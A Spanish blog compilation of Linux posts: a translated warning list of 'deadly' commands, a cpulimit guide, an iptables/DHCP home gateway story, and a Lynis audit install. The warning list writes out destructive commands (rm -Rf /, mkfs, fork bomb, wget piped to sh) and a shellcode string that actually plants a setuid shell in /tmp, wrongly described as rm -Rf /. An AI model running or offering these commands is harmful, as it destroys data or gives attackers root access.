Esta es una traducción de el interesante artículo “The 7 Deadly Linux Commands” publicado originalmente por Tech Source from Bohol:

Si eres nuevo en Linux, es probable que en algún momento te encuentres en algún foro o una sala de chat, con una persona malintencionada y poco inteligente que pretenda engañarte para que utilices comandos que puedan dañar tus archivos o incluso arruinar todo tu sistema operativo. Para evitar que se presente este peligroso escenario, he aquí una lista de comandos mortales en Linux que deberian ser evitados:

1. Comando:

# rm -Rf /

Este comando eliminará a la fuerza y recursivamente (incluyendo subdirectorios), todos los archivos dentro del directorio raiz.

2. Comando:

char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “’xeb’x3e’x5b’x31’xc0’x50’x54’x5a’x83’xec’x64’x68?
“’xff’xff’xff’xff’x68’xdf’xd0’xdf’xd9’x68’x8d’x99?
“’xdf’x81’x68’x8d’x92’xdf’xd2’x54’x5e’xf7’x16’xf7?
“’x56’x04’xf7’x56’x08’xf7’x56’x0c’x83’xc4’x74’x56?
“’x8d’x73’x08’x56’x53’x54’x59’xb0’x0b’xcd’x80’x31?
“’xc0’x40’xeb’xf9’xe8’xbd’xff’xff’xff’x2f’x62’x69?
“’x6e’x2f’x73’x68’x00’x2d’x63’x00?
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Esta es la versión hexadecimal de [rm -Rf / ], con la cual podria engañarse incluso a usuarios linux mas experimentados.

3. Comando:

# mkfs.ext3 /dev/sda

Reformatea o elimina todos los archivos del dispositivo mencionado despues del comando mkfs.

4. Comando:

:(){:|:&};:

La ya conocida por muchos bomba fork. Este comando hará que tu sistema ejecute un elevado número de procesos, hasta que el mismo se “cuelgue”. A menudo esto puede acarrear perdida de datos.

5. Comando:

cualquier_comando > /dev/sda

Con este comando, se envian bloques de datos al dispositivo indicado, lo cual a menudo puede colapsar el sistema de archivos, dando como resultado una perdida total de datos.

6. Comando:

wget http://fuente_de_origen_inseguro -O- | sh

Estamos descargando datos, posiblemente un script, de alguna fuente no muy confiable, e inmediatamente despues, estamos ordenando que se ejecute el archivo descargado. Nunca, nunca hagas esto.

7. Comando:

mv /home/tudirectoriodeusuario/* /dev/null

Este comando mueve todos los archivos dentro de tu directorio home, a un lugar que no existe, razón por la cual, nunca podras ver tus archivos de nuevo.

Hay una gran cantidad de comandos igualmente mortales, los cuales pudieron omitirse en esta lista, por eso si tienes alguno para agregar, por favor compartelo con nosotros a traves de un comentario.

Fuente

Traducido.

Su función es  limitar el uso del % que puede usar un proceso del CPU.

Forma de instalación

sudo apt-get install cpulimit

Formas de limitar el proceso:

Por nombre del proceso , por pid  y por el patch.

Ejemplos

Limitar al pograma  que no pueda usar mas del 50% del procesador.

cpulimit –e NOMBREAPLICACION –limit 50

Limitara al pid  que no pueda usar mas del 50% del procesador.

cpulimit -p 1234 -l 50

Limitar al pograma representado con el patch, a que no pueda usar mas del 50% del procesador.

cpulimit -P /usr/bin/programa -l 50

Nota: Esta herramienta reconoce los procesadores de doble nueclo con 200%,

Para mas información: man cpulimit.

Fuente

Introduccion

Hace algunos dias en la empresa donde me desempeño, se realizo limpieza de tipo hardware y actualizacion donde variado equipo se limpio y se amplio en capacidad, por lo mismo fue imposible no desechar algunos herramientas, como lectoras de codigos de barras, impresoras de punto matriz, de inyeccion de tinta, y una computadora, todo este equipo a exepcion del ultimo se tuvo que remover debido al mal estado y lo obsoleto que estaba. Pero el ordenador tenia una historia especial, la tarjeta madre de marca Intel, cuenta con slots de tipo RIMM una memoria, de mucha eficiencia debido a que esta siempre se pone por pares, pero el costo de esta misma es elevado. La persona de recursos humanos encargada de las compras reporto que debido al costo exorbitante, ya que si se obtenia un juego de 512Mb, se invertia mas de $1,300 pesos, no era conveniente a la empresa ya que invirtiendo un par de cientos mas, obtenian un procesador, memorias y tarjeta madre nuevas y con mucha mas eficiencia.

Por lo que esta misma se tuvo que desarmar ya que el gabinete y fuente eran reutilizables. Al ver esto y poder imaginar el potencial del mismo, realize una oferta de $100 pesos por el procesador p4 @ 1.4Ghz, 128Mb Ram y tarjeta madre, el encargado del area de inventario de almacenes, rio y me dijo que solo comprara un par de refrescos para mitigar la sed y accedi ya que mi objetivo era ponerle las manos a ese hardware.

Al llegar a mi casa, busque entre mis cosas un HDD de 40Gb que estaba abandonado, un lector de 8x, una tarjeta de video de slot PCI (imaginense lo viejo del equipo), una fuenta de 250Wats y un ventilador enpolvado. Sin importar para que me serviria me decidi a instalarle Debian/GNU

Desarrollo

Al momento de estar realizando la instalacion de Debian me di cuenta de dos cosas muy importantes, la primera era que el equipo no podria estar asi al aire libre y todas las piezas en mi escritorio, asi que me decido ponerlas en una caja de carton. La segunda era que ocupa un firewall como piedra y con reglas muy estrictas, para evitar los embates de algun “kiddie”, asi que me decidi crearlo para toda mi red, ya que mis hermanos y padres, son usuarios Windows decidi protegerlos asi que pense hacerlo un gateway/firewall con servicio de DHCP, para evitar configurarles alguna IP.

Asi que instale el famoso y muy preciado IPTables, asi como DHCP3-server. El primer paquete busque alguna configuracion generica, con la cual llegue algun ejemplo, ademas explicare la topografia de mi red:

Internet (red externa)
           |
           | eth0
       [gateway]
           | eth1
           |
        Red local

Primero, modifique la configuracion de la tarjeta eth1, para asignarla una IP fija de la red que quiero que administre:

nano /etc/network/interfaces

y agregue la siguientes lineas:

auto eth1
iface eth1 inet static
address 192.168.5.1
netmask 255.255.255.0

Con este tipo de arreglo decidi realizar lo siguiente con Iptables:

$ cd /etc/network/if-up.d

$ nano firewall

y escribi el siguiente codigo:

#!/bin/sh

PATH=/usr/sbin:/sbin:/bin:/usr/bin

#
# delete all existing rules.
#
iptables -F
iptables -t nat -F
iptables -t mangle -F
iptables -X

# Always accept loopback traffic
iptables -A INPUT -i lo -j ACCEPT

# Allow established connections, and those not coming from the outside
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -m state --state NEW -i ! eth0 -j ACCEPT
iptables -A FORWARD -i eth0 -o eth1 -m state --state ESTABLISHED,RELATED -j ACCEPT

# Allow outgoing connections from the LAN side.
iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT

# Masquerade.
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Don't forward from the outside to the inside.
iptables -A FORWARD -i eth0 -o eth0 -j REJECT

# Enable routing.
echo 1 > /proc/sys/net/ipv4/ip_forward

Despues de esto lo guarde y le di permisos de ejecucion, todo esto para saber si estaba funcionando, ya que si lo estaria, empezaria una serie de reglas que tenia que adaptar a mi equipo, por lo que escribi lo siguiente en consola:

chmod +x /etc/network/if-up.d/firewall

Al realizar las pruebas, me di cuenta que funcionaba de maravilla asi que agrega otras lineas mas, para adaptar lo que tenia en mi red. Despues de esto le toco el turno a DHCP, todo esto para evitar configurar IP’s, a los equipos de mi familia, por lo que realize lo siguiente:

apt-get install dhcp3-server

nano /etc/default/dhcp3-server

y solo modfique la ultima linea agregando la interfaz que se encargaria de dar el servicio DHCP, en este caso eth1:

INTERFACES=’eth1′

Ahora toco el tiempo de realizar la configuracion de mi red, que tiene que coincidir con lo que escribi en mi eth1, por lo que realize lo siguiente:

mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bak

nano /etc/dhcp3/dhcpd.conf

Ahora solo agregue las siguientes lineas:

subnet 192.168.5.0 netmask 255.255.255.0 {

range 192.168.5.2 192.168.5.50;

option broadcast-address 192.168.5.255;

option routers 192.168.5.1;

option domain-name “cerberus”;

default-lease-time 3600;

option domain-name-servers 192.168.1.254;

}

Y como soy un poco flojo en esto de configurar, no instala el bind9 para que me resolviera los nombres, si no todo se lo deje a mi router, como ustedes pueden ver en la ultima linea. Solo guarde y realize lo ultimo

/etc/init.d/dhcp3-server restart

y listo! tengo ahora un servicio extra el cual me salio demasiado barato. Al contarle de esto a la persona que me “regalo” las piezas, se quedo pensante, imaginando todas las oportunidades que dejo perder. El resultado fue el siguiente, para quienes dudan, algunas imagenes:

Y otra por dentro:

Conclusion:

Como ustedes de habran dado cuenta, el ingenio y la gran capacidad que se nos puede gracias a los sistemas de codigo abierto es lo mejor, podemos crear hardware que en el mercado valdria cientos, y hasta miles de dolares, ya que acabamos de crear un firewall tipo Fortinet o Sonicwall, ademas de un servidor DHCP, ademas de esto se pueden agregar muchos mas servicios mas. Ojala y disfrutaran la anecdota y esto “how-to” escondido en una historia.

Extras:

Configuracion Getaway basada en: Debian-Administration.org

Todo se realizo mediante el servicio SSH, asi que no se instalo interfaz grafica para evitar desperdicio de memoria.

Tratare de conseguir algun gabinete gratis y viejo y darle color y dejarlo mucho mejor.
[Fuente]

1. Descomprimimos la utlidad:

# wget http://www.rootkit.nl/files/lynis-1.1.7.tar.gz
# tar zxfv lynis-1.1.7.tar.gz

2. Ejecutamos la aplicacion:

# cd lynis-1.1.7

# ./lynis –check-all

Con esto comenzamos la auditora de nuestro sistema, acontinuacion vamos a dar algunos titulos de los analisis:

[+] Boot and services
[+] Kernel
[+] Memory and processes
[+] Users, Groups and Authentication
[+] Shells
[+] File systems
[+] Ports and packages
[+] Networking
[+] Printers and Spools
[+] Software: e-mail
[+] Software: firewalls
[+] Software: webserver
[+] Databases
[+] LDAP Services
[+] Software: PHP
[+] Software: Malware scanners
[+] System Tools
[+] Home directories
[+] Logging and files
[+] Banners and identification
[+] Scheduled tasks
[+] Accounting
[+] Time and Synchronization
[+] Cryptography
[+] Virtualization
Veamos una captura de pantalla de la utilidad:

Aqui vemos el reporte que nos entrego al analizar uno de los equipos del staff:

Fuente

Navegando por internet encontré un articulo el cual creo que les puede ser útil a  muchas personas que están comenzando con el mundo de Linux o tal vez no, ya están iniciado y tiene dudas sobre los directorios en Linux, así que he decidido postearlo, explica de una forma grafica y breve como esta organizado el árbol de directorio de Linux y que podemos encontrar en cada uno de ellos:

Bueno espero que les sea util

La imagen la vi aquí.